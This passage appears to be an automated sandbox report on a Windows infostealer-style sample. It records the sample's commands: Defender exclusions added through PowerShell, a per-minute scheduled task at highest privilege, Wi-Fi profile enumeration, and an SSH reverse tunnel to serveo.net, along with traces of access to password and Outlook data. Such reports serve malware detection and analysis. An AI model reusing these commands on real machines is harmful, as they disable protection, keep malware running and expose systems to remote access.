                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: jqOHOuPMJP.exe, BootstrapLoader.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: jqOHOuPMJP.exe, BootstrapLoader.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@66/19@3/6
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJump to behavior
                  Source: jqOHOuPMJP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jqOHOuPMJP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jqOHOuPMJP.exeReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exeVirustotal: Detection: 24%
                  Source: unknownProcess created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID SignalJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.netJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: jqOHOuPMJP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
